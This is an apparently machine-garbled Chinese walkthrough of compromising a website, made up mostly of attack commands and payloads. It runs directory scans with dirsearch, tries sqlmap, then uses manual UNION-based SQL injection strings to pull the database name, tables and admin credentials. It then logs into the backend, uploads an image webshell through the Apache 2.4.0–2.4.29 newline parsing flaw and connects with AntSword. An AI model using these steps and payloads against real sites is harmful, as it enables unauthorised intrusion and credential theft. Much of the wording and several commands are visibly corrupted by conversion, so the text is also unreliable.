1.关上指标网站
2.信息收集,应用dirsearch对网站进行目录扫描
python dirsearch.py -u xxx.com -e *python dirsearch.py -u xxx.com -e phppython dirsearch.py -u xxx.com -e jsp* 示意扫描PHP和JSPphp 示意扫描PHPjsp 示意扫描JSP
3.剖析扫描后果200->通路403/404无奈联通
所以咱们查看对象是绿色字体的200的返回目录
咱们能够一个一个的尝试,发现存在一个叫/cms的目录,进入看看
4.发现这个才是实在的站点,后面那个只是钓鱼页面
接下来咱们察看一下这个页面,是否存在交互点
咱们先应用sqlmap对指标站点进行sql注入尝试
python sqlmap.py -u xxx.com --dbssqlmap给出的后果是:
[17:34:47] [WARNING] GET parameter 'id' does not seem to be injectablesqlmap没有发现注入点,咱们尝试手动注入,从搜寻框开始
5.手动注入
' union select 1,2,3 #发现存在3个回显点
' union select 1,2,database() #胜利提取到数据库名sqlgunnews
'union select 1,2,table_name from information_schema.tables where table_schema=database() #胜利提取到数据库表名
admin2
class2
news2
system
' union select 1,2,column_name from information_schema.columns where table_name='admin' #胜利提取到admin表的字段
' and 1=1 union select 1,admin from admin,3 # ' and 1=1 union select 1,password from admin,3 # 胜利提取管理员账号admin 明码 pass123
6.寻找后盾
再次应用dirsearch扫描/cms 发现后盾地址
输出管理员账号密码进入后盾
7.发现文件上传性能,上传图片马
设置好代理
通过burp抓包后,定位到文件地位
利用apache换行解析破绽(影响范畴:2.4.0-2.4.29版本)
Apache解析破绽次要是因为Apache默认一个文件能够有多个用.宰割的后缀,当最左边的后缀无奈辨认(mime.types文件中的为非法后缀)则持续向左看,直到碰到非法后缀才进行解析(以最初一个非法后缀为准)
胜利绕过前后端文件上传检测,上传木马
8.应用蚁剑连贯,胜利拿到webshell
胜利拿下